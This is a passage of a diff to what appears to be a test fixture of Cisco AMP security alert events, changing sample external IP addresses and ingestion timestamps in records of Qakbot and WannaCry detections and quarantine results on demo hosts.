Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4701,7 +4701,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4744,7 +4744,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4758,8 +4758,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025336406Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764222200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4781,7 +4781,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4822,7 +4822,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4832,8 +4832,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025338670Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764226200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4853,7 +4853,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4912,7 +4912,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4929,8 +4929,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025366396Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764254100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4952,7 +4952,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -5015,7 +5015,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5032,8 +5032,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025370523Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764345400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -5055,7 +5055,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -5100,7 +5100,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5110,8 +5110,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025372836Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764350700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -5131,7 +5131,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5172,7 +5172,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5182,8 +5182,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025375107Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764356Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5203,7 +5203,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5248,7 +5248,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5258,8 +5258,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025377372Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764377900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5279,7 +5279,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5324,7 +5324,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -5334,8 +5334,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025383531Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764381800Z", + "original": 